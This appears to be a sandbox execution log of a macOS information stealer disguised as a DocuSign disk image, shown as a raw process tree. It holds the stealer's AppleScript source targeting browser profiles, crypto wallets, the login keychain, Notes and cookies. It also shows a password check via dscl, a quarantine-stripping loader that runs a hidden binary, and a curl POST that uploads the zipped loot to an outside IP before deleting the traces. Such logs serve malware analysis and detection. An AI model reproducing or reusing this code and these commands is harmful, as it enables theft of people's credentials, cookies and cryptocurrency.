{\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" "
  2⤵
  PID:529

/bin/sh
sh -c "echo \$((RANDOM % 9000 + 1000))"
1⤵
PID:530

/bin/bash
sh -c "echo \$((RANDOM % 9000 + 1000))"
1⤵
PID:530

/bin/sh
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
1⤵
PID:531

/bin/bash
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
1⤵
PID:531

/usr/sbin/system_profiler
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
1⤵
PID:531

/usr/bin/csrutil
/usr/bin/csrutil status
1⤵
PID:533

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:536

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:536

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:536

/bin/sh
sh -c "dscl . authonly 'run' ''"
1⤵
PID:537

/bin/bash
sh -c "dscl . authonly 'run' ''"
1⤵
PID:537

/usr/bin/dscl
dscl . authonly run
1⤵
PID:537

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:538

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:538

/bin/sh
sh -c "dscl . authonly 'run' 'ELVO5'"
1⤵
PID:540

/bin/bash
sh -c "dscl . authonly 'run' 'ELVO5'"
1⤵
PID:540

/usr/bin/dscl
dscl . authonly run ELVO5
1⤵
PID:540

/bin/sh
sh -c "dscl . authonly 'run' ''"
1⤵
PID:541

/bin/bash
sh -c "dscl . authonly 'run' ''"
1⤵
PID:541

/usr/bin/dscl
dscl . authonly run
1⤵
PID:541

/bin/sh
sh -c "dscl . authonly 'run' 'run'"
1⤵
PID:542

/bin/bash
sh -c "dscl . authonly 'run' 'run'"
1⤵
PID:542

/usr/bin/dscl
dscl . authonly run run
1⤵
PID:542

/bin/sh
sh -c "dscl . authonly 'run' 'root'"
1⤵
PID:543

/bin/bash
sh -c "dscl . authonly 'run' 'root'"
1⤵
PID:543

/usr/bin/dscl
dscl . authonly run root
1⤵
PID:543

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:544

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:544

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:544

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:545

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:545

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:545

/bin/sh
sh -c "cat '/Users/run/Library/Keychains/login.keychain-db' > '/tmp/1458/keychain'"
1⤵
PID:546

/bin/bash
sh -c "cat '/Users/run/Library/Keychains/login.keychain-db' > '/tmp/1458/keychain'"
1⤵
PID:546
- /bin/cat
  cat /Users/run/Library/Keychains/login.keychain-db
  2⤵
  PID:547

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite'"
1⤵
PID:548

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite'"
1⤵
PID:548

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/NoteStore.sqlite
1⤵
PID:548

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:549

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:549

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:549

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.FDDAD8C3-AC74-427E-B388-BBB21B2C5E73
1⤵
PID:552

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:552

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-wal'"
1⤵
PID:553

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-wal'"
1⤵
PID:553

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/NoteStore.sqlite-wal
1⤵
PID:553

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:554

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:554

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:554

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.E24219E7-ECF9-4994-93BA-BF48FF6E5C24
1⤵
PID:555

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:555

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-shm'"
1⤵
PID:556

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-shm'"
1⤵
PID:556

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/NoteStore.sqlite-shm
1⤵
PID:556

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:557

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:557

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:557

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.3936242C-0083-483F-AF41-AFA7357C93CB
1⤵
PID:558

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:558

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/Cookies.binarycookies'"
1⤵
PID:559

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/Cookies.binarycookies'"
1⤵
PID:559

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/Cookies.binarycookies
1⤵
PID:559

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:560

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:560

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:560

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.67764882-FA8B-40F5-BAC8-D79E8F26BDE6
1⤵
PID:561

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:561

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:562

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:562

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:562

/bin/sh
sh -c "cat '/Users/run/Library/Cookies/Cookies.binarycookies' > '/tmp/1458/FileGrabber/saf1'"
1⤵
PID:563

/bin/bash
sh -c "cat '/Users/run/Library/Cookies/Cookies.binarycookies' > '/tmp/1458/FileGrabber/saf1'"
1⤵
PID:563
- /bin/cat
  cat /Users/run/Library/Cookies/Cookies.binarycookies
  2⤵
  PID:564

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber/'"
1⤵
PID:565

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber/'"
1⤵
PID:565

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber/
1⤵
PID:565

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber/NotesFiles/'"
1⤵
PID:566

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber/NotesFiles/'"
1⤵
PID:566

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber/NotesFiles/
1⤵
PID:566

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.917AB09E-2D02-4D74-849D-72C17A0A3635
1⤵
PID:567

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:567

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:568

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:568

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:568

/bin/sh
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:569

/bin/bash
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:569

/bin/mkdir
mkdir -p /tmp/1458/ff/2mzklot7.dev-edition-default
1⤵
PID:569

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/cookies.sqlite' > '/tmp/1458/ff/2mzklot7.dev-edition-default/cookies.sqlite'"
1⤵
PID:570

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/cookies.sqlite' > '/tmp/1458/ff/2mzklot7.dev-edition-default/cookies.sqlite'"
1⤵
PID:570
- /bin/cat
  cat "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/cookies.sqlite"
  2⤵
  PID:571

/bin/sh
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:572

/bin/bash
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:572

/bin/mkdir
mkdir -p /tmp/1458/ff/2mzklot7.dev-edition-default
1⤵
PID:572

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/key4.db' > '/tmp/1458/ff/2mzklot7.dev-edition-default/key4.db'"
1⤵
PID:573

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/key4.db' > '/tmp/1458/ff/2mzklot7.dev-edition-default/key4.db'"
1⤵
PID:573
- /bin/cat
  cat "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/key4.db"
  2⤵
  PID:574

/bin/sh
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:575

/bin/bash
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:575

/bin/mkdir
mkdir -p /tmp/1458/Chromium/Chrome_Default
1⤵
PID:575

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Cookies' > '/tmp/1458/Chromium/Chrome_Default/Cookies'"
1⤵
PID:576

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Cookies' > '/tmp/1458/Chromium/Chrome_Default/Cookies'"
1⤵
PID:576
- /bin/cat
  cat "/Users/run/Library/Application Support/Google/Chrome/Default/Cookies"
  2⤵
  PID:577

/bin/sh
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:578

/bin/bash
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:578

/bin/mkdir
mkdir -p /tmp/1458/Chromium/Chrome_Default
1⤵
PID:578

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Web Data' > '/tmp/1458/Chromium/Chrome_Default/Web Data'"
1⤵
PID:579

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Web Data' > '/tmp/1458/Chromium/Chrome_Default/Web Data'"
1⤵
PID:579
- /bin/cat
  cat "/Users/run/Library/Application Support/Google/Chrome/Default/Web Data"
  2⤵
  PID:580

/bin/sh
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:581

/bin/bash
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:581

/bin/mkdir
mkdir -p /tmp/1458/Chromium/Chrome_Default
1⤵
PID:581

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Login Data' > '/tmp/1458/Chromium/Chrome_Default/Login Data'"
1⤵
PID:582

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Login Data' > '/tmp/1458/Chromium/Chrome_Default/Login Data'"
1⤵
PID:582
- /bin/cat
  cat "/Users/run/Library/Application Support/Google/Chrome/Default/Login Data"
  2⤵
  PID:583

/bin/sh
sh -c "ditto -c -k --sequesterRsrc /tmp/1458/ /tmp/out.zip"
1⤵
PID:584

/bin/bash
sh -c "ditto -c -k --sequesterRsrc /tmp/1458/ /tmp/out.zip"
1⤵
PID:584

/usr/bin/ditto
ditto -c -k --sequesterRsrc /tmp/1458/ /tmp/out.zip
1⤵
PID:584

/bin/sh
sh -c "curl -X POST -H \"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\" -H \"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\" -H \"cl: 0\" -H \"cn: 0\" --max-time 300 -retry 5 -retry-delay 10 -F \"file=@/tmp/out.zip\" http://141.98.9.20/joinsystem"
1⤵
PID:585

/bin/bash
sh -c "curl -X POST -H \"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\" -H \"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\" -H \"cl: 0\" -H \"cn: 0\" --max-time 300 -retry 5 -retry-delay 10 -F \"file=@/tmp/out.zip\" http://141.98.9.20/joinsystem"
1⤵
PID:585

/usr/bin/curl
curl -X POST -H "user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=" -H "BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=" -H "cl: 0" -H "cn: 0" --max-time 300 "-retry" 5 "-retry-delay" 10 -F "file=@/tmp/out.zip" http://141.98.9.20/joinsystem
1⤵
PID:585

/bin/sh
sh -c "rm -r /tmp/1458/"
1⤵
PID:586

/bin/bash
sh -c "rm -r /tmp/1458/"
1⤵
PID:586

/bin/rm
rm -r /tmp/1458/
1⤵
PID:586

/bin/sh
sh -c "rm /tmp/out.zip"
1⤵
PID:587

/bin/bash
sh -c "rm /tmp/out.zip"
1⤵
PID:587

/bin/rm
rm /tmp/out.zip
1⤵
PID:587

/usr/libexec/xpcproxy
xpcproxy org.mozilla.firefoxdeveloperedition.3088
1⤵
PID:588

/Applications/Firefox Developer Edition.app/Contents/MacOS/firefox
"/Applications/Firefox Developer Edition.app/Contents/MacOS/firefox"
1⤵
PID:588

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -parentBuildID 20240628091536 -prefsLen 24681 -prefMapSize 248244 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{043313b5-d3ab-412d-baed-99c39897ceb0}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1101942401 socket
1⤵
PID:591

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 1 -isForBrowser -prefsLen 24745 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{0b69578d-0792-4618-a4ac-b744b3ea123f}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.292495982 tab
1⤵
PID:592

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 2 -isForBrowser -prefsLen 28106 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{3d9c3f77-c95f-406a-9d52-4433bfd7fb0a}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.31092608 tab
1⤵
PID:593

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 3 -isForBrowser -prefsLen 30477 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{3df60387-2707-41c3-820b-7c30e1305e2f}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1016985583 tab
1⤵
PID:594

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -parentBuildID 20240628091536 -sandboxingKind 0 -prefsLen 30477 -prefMapSize 248244 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{daf1cbd7-884b-41c7-a051-2be6288a63dc}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1185368082 utility
1⤵
PID:596

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 4 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{771f4a74-9263-4824-a798-ad64b6fd6ee7}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.364094713 tab
1⤵
PID:597

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 5 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{eb4a3a7f-dfca-4adb-ae42-eb5147346cb7}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.480578065 tab
1⤵
PID:598

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 6 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{bbd3149c-5dca-4e6c-9a9f-b5c1657ab0e9}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1368739078 tab
1⤵
PID:599

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 7 -isForBrowser -prefsLen 28250 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{2fe96c36-67a0-42d6-8e9c-e781c2378125}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1421779236 tab
1⤵
PID:600

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.2028
1⤵
PID:601

/Applications/Safari.app/Contents/MacOS/Safari
/Applications/Safari.app/Contents/MacOS/Safari
1⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.History
1⤵
PID:602

/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
1⤵
PID:602

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.A06F79AA-F5E9-4313-AA2C-7EE3424FEB3C 601
1⤵
PID:603

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:603

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/DocuSignWITWB\""
1⤵
PID:495

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/DocuSignWITWB\""
1⤵
PID:495

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/DocuSignWITWB"
1⤵
PID:495
- /bin/zsh
  /bin/zsh -c "open /Volumes/DocuSignWITWB"
  2⤵
  PID:497
- /usr/bin/open
  open /Volumes/DocuSignWITWB
  2⤵
  PID:497

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:500

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:500

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:501

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:501

/usr/libexec/xpcproxy
xpcproxy com.apple.nsurlstoraged
1⤵
PID:502

/usr/libexec/nsurlstoraged
/usr/libexec/nsurlstoraged --privileged
1⤵
PID:502

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.2100
1⤵
PID:510

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:510
- /usr/bin/login
  login -pf run
  2⤵
  PID:511
- - /bin/zsh
    -zsh
    3⤵
    PID:512
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:513
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:514
  - - /Volumes/DocuSignWITWB/DocuSignWITWB.file
      /Volumes/DocuSignWITWB/DocuSignWITWB.file
      4⤵
      PID:516
    - - /bin/bash
        
        bash -c "#!/bin/bash osascript -e 'on run try set volumeList to list disks end try set setupVolume to \"\" try repeat with vol in volumeList if vol contains \"DocuSignWITWB\" then set setupVolume to vol exit repeat end if end repeat end try if setupVolume is \"\" then return end if set scriptDir to \"/Volumes/\" & setupVolume & \"/\" set executableName to \".DocuSignWITWB\" set executablePath to scriptDir & executableName set tmpExecutablePath to \"/tmp/\" & executableName try do shell script \"rm -f \" & quoted form of tmpExecutablePath end try try do shell script \"cp \" & quoted form of executablePath & \" \" & quoted form of tmpExecutablePath end try try do shell script \"xattr -c \" & quoted form of tmpExecutablePath end try try do shell script \"chmod +x \" & quoted form of tmpExecutablePath end try try do shell script quoted form of tmpExecutablePath end try end run'"
        5⤵
        
        PID:520
    - - /usr/bin/osascript
        
        osascript -e "on run try set volumeList to list disks end try set setupVolume to \"\" try repeat with vol in volumeList if vol contains \"DocuSignWITWB\" then set setupVolume to vol exit repeat end if end repeat end try if setupVolume is \"\" then return end if set scriptDir to \"/Volumes/\" & setupVolume & \"/\" set executableName to \".DocuSignWITWB\" set executablePath to scriptDir & executableName set tmpExecutablePath to \"/tmp/\" & executableName try do shell script \"rm -f \" & quoted form of tmpExecutablePath end try try do shell script \"cp \" & quoted form of executablePath & \" \" & quoted form of tmpExecutablePath end try try do shell script \"xattr -c \" & quoted form of tmpExecutablePath end try try do shell script \"chmod +x \" & quoted form of tmpExecutablePath end try try do shell script quoted form of tmpExecutablePath end try end run"
        5⤵
        
        PID:520

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:515

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
